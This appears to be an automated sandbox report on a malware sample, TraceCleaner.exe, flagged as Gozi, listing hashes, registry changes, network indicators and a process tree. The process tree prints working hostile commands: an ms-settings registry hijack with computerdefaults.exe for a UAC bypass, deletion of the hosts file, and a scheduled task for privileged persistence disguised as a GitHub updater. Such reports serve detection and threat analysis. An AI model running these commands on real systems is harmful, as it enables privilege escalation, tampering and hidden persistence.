Analysis
max time kernel: 42s
max time network: 48s
platform: windows10-2004_x64
resource: win10v2004-20240226-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
submitted: 06-03-2024 19:05
Static task: static1
Behavioral task: behavioral1
Sample: TraceCleaner.exe
Resource: win7-20240221-en
General
Target: TraceCleaner.exe
Size: 11KB
MD5: 33fbca8dc3230e2c0c36678c787a63d8
SHA1: e5827fdc5262df48ab53d766a74f2a700cb6b049
SHA256: 109b359176e064a3b40100491fbd3217a9a0b7027fd2fee05c5930a2df06770c
SHA512: 299a4148337f46c32df4837bcf8dfa2d9984c1b174aec8052e8fd4d7b823b7a50f8f5c990f436578ed7f73a16cf77cced465262b22281d78fd53db0ef89cc6e0
SSDEEP: 192:5x8JZ+SbRcum8HKH0BGEPEwzsrogKym+MKNA5jKmo:5xi+K88u0BGEsJogKyHMqAJKm
Malware Config
Extracted
gozi
Signatures

Checks computer location settings (2 TTPs, 2 IoCs)
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation | TraceCleaner.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation | wscript.exe

Loads dropped DLL (1 IoC)
pid | Process
3032 | TraceCleaner.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
flow | ioc
34 | raw.githubusercontent.com
35 | raw.githubusercontent.com

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
SCSI information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | taskmgr.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | taskmgr.exe

Creates scheduled task(s) (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
4984 | schtasks.exe

Modifies registry class (7 IoCs)
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" | reg.exe
Key created | \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000_Classes\ms-settings\shell\open\command | reg.exe
Key created | \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000_Classes\ms-settings | reg.exe
Key created | \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000_Classes\ms-settings\shell | reg.exe
Key created | \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000_Classes\ms-settings\shell\open | reg.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000_Classes\ms-settings\shell\open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\halfkyle53614797.vbs" | reg.exe
Key created | \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000_Classes\ms-settings\shell\open\command | reg.exe

Suspicious behavior: EnumeratesProcesses (20 IoCs)
pid | Process
4356 | taskmgr.exe (20 identical events)

Suspicious use of AdjustPrivilegeToken (6 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 3032 | TraceCleaner.exe
Token: SeDebugPrivilege | 4356 | taskmgr.exe
Token: SeSystemProfilePrivilege | 4356 | taskmgr.exe
Token: SeCreateGlobalPrivilege | 4356 | taskmgr.exe
Token: 33 | 4356 | taskmgr.exe
Token: SeIncBasePriorityPrivilege | 4356 | taskmgr.exe

Suspicious use of FindShellTrayWindow (44 IoCs)
pid | Process
4356 | taskmgr.exe (44 identical events)

Suspicious use of SendNotifyMessage (44 IoCs)
pid | Process
4356 | taskmgr.exe (44 identical events)

Suspicious use of WriteProcessMemory (24 IoCs)
description | pid | Process | procid_target
PID 3032 wrote to memory of 1920 | 3032 | TraceCleaner.exe | 99 (3 events)
PID 3032 wrote to memory of 1960 | 3032 | TraceCleaner.exe | 101 (3 events)
PID 3032 wrote to memory of 232 | 3032 | TraceCleaner.exe | 103 (3 events)
PID 232 wrote to memory of 4072 | 232 | cmd.exe | 105 (3 events)
PID 4072 wrote to memory of 2284 | 4072 | ComputerDefaults.exe | 106 (3 events)
PID 2284 wrote to memory of 2760 | 2284 | wscript.exe | 108 (3 events)
PID 3032 wrote to memory of 868 | 3032 | TraceCleaner.exe | 112 (3 events)
PID 868 wrote to memory of 4984 | 868 | cmd.exe | 114 (3 events)
Processes (indentation shows parent/child depth)

C:\Users\Admin\AppData\Local\Temp\TraceCleaner.exe (depth 1)
    Command line: "C:\Users\Admin\AppData\Local\Temp\TraceCleaner.exe"
    - Checks computer location settings
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 3032

    C:\Windows\SysWOW64\reg.exe (depth 2)
        Command line: "C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\halfkyle53614797.vbs" /f
        - Modifies registry class
        PID: 1920

    C:\Windows\SysWOW64\reg.exe (depth 2)
        Command line: "C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /v DelegateExecute /d "0" /f
        - Modifies registry class
        PID: 1960

    C:\Windows\SysWOW64\cmd.exe (depth 2)
        Command line: "cmd.exe" /C computerdefaults.exe
        - Suspicious use of WriteProcessMemory
        PID: 232

        C:\Windows\SysWOW64\ComputerDefaults.exe (depth 3)
            Command line: computerdefaults.exe
            - Suspicious use of WriteProcessMemory
            PID: 4072

            C:\Windows\SysWOW64\wscript.exe (depth 4)
                Command line: "wscript.exe" C:\Users\Admin\AppData\Local\Temp\halfkyle53614797.vbs
                - Checks computer location settings
                - Suspicious use of WriteProcessMemory
                PID: 2284

                C:\Windows\SysWOW64\cmd.exe (depth 5)
                    Command line: "C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts
                    PID: 2760

    C:\Windows\SysWOW64\cmd.exe (depth 2)
        Command line: "C:\Windows\System32\cmd.exe" /C schtasks /Create /SC ONLOGON /TN GitHubDesktopUpdater_ByDQCYCY0O0mF82xY050MX /TR "C:\Users\Admin\AppData\Local\Microsoft\Windows\Shell\ByDQCYCY0O0mF82xY050MX.exe" /RL HIGHEST /IT
        - Suspicious use of WriteProcessMemory
        PID: 868

        C:\Windows\SysWOW64\schtasks.exe (depth 3)
            Command line: schtasks /Create /SC ONLOGON /TN GitHubDesktopUpdater_ByDQCYCY0O0mF82xY050MX /TR "C:\Users\Admin\AppData\Local\Microsoft\Windows\Shell\ByDQCYCY0O0mF82xY050MX.exe" /RL HIGHEST /IT
            - Creates scheduled task(s)
            PID: 4984

C:\Windows\system32\taskmgr.exe (depth 1)
    Command line: "C:\Windows\system32\taskmgr.exe" /4
    - Checks SCSI registry key(s)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID: 4356
Network
MITRE ATT&CK Enterprise v15
Downloads

Download 1
Filesize: 1.4MB
MD5: 6f2fdecc48e7d72ca1eb7f17a97e59ad
SHA1: fcbc8c4403e5c8194ee69158d7e70ee7dbd4c056
SHA256: 70e48ef5c14766f3601c97451b47859fddcbe7f237e1c5200cea8e7a7609d809
SHA512: fea98a3d6fff1497551dc6583dd92798dcac764070a350fd381e856105a6411c94effd4b189b7a32608ff610422b8dbd6d93393c5da99ee66d4569d45191dc8b

Download 2
Filesize: 171B
MD5: a34267102c21aff46aecc85598924544
SHA1: 77268af47c6a4b9c6be7f7487b2c9b233d49d435
SHA256: eba7ab5c248e46dbe70470b41ebf25a378b4eff9ce632adff927ac1f95583d44
SHA512: 5d320312b93b46c9051a20c82d6405a3f2c78b23adb3ab3e71aad854b65b500937de7ca2986cf79967386d689beecccf676d89afde8ecc5d5ad0cb4ae2bf38a3